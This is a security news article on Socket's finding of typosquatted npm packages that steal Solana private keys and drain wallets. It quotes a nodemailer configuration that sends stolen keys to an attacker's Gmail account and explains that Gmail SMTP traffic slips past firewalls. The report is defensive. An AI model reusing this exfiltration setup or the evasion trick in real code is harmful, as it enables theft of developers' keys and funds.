Hackers Weaponize npm Packages To Steal Solana Private Keys Via Gmail

Hackers have deployed malicious npm packages designed to exfiltrate Solana private keys through Gmail’s trusted infrastructure, as uncovered recently by Socket’s threat research team.

The campaign, which came to light on January 8, 2025, exploits the inherent trust in Gmail’s SMTP servers to bypass security measures and steal sensitive cryptocurrency data.

The malicious packages, identified as @async-mutex/mutex, dexscreener, solana-transaction-toolkit, and solana-stable-web-huks, employ typosquatting techniques to masquerade as legitimate tools.

Security analysts discovered that all these packages intercept private keys during wallet interactions and funnel them through Gmail’s SMTP servers, making detection by firewalls and endpoint security systems challenging.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Technical Details

The attackers utilized two distinct methods:-

1. Key Exfiltration: The packages @async-mutex/mutex and dexscreener focus on stealing and transmitting private Solana keys. They use the following code structure for exfiltration:

const transporter = nodemailer.createTransport({
    host: "smtp.gmail.com",
    port: 465,
    secure: true,
    auth: {
        user: "vision.high.ever@gmail.com",
        pass: "[redacted]",
    },
});

2. Wallet Draining: The packages solana-transaction-toolkit and solana-stable-web-huks go a step further by programmatically draining victims’ wallets. They transfer up to 98% of the wallet contents to the attacker-controlled Solana address: 3RbBjhVRi8qYoGB5NLiKEszq2ci559so4nPqv2iNjs8Q.

The malicious packages have been downloaded over 130 times, potentially compromising numerous developer accounts and environments. The attackers also leveraged GitHub repositories to lend credibility to their campaign, creating a façade of legitimacy for unsuspecting developers.

Kirill Boychenko, a threat intelligence analyst at Socket affirmed “Because Gmail is a trusted email service, these exfiltration attempts are less likely to be flagged by firewalls or endpoint detection systems, which treat smtp.gmail.com as legitimate traffic.”

This incident highlights the growing trend of cybercriminals exploiting trusted platforms like GitHub and npm for malicious purposes. In 2024, the number of malicious packages found on open source package managers surged by 1300% compared to 2020.

Socket’s researchers warned that AI-powered descriptions could inadvertently lend credibility to malicious software, potentially guiding even cautious users towards installing harmful dependencies.

Developers are urged to exercise caution when installing npm packages, especially those with low download counts or recent publication dates. Socket recommends using their GitHub app and CLI tools to scan dependencies for potential threats.

Additionally, cryptocurrency platforms and individual wallet holders should remain vigilant and ensure their accounts are secure.

Regular audits of dependencies and strict access controls around private keys are crucial in mitigating such risks.

Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar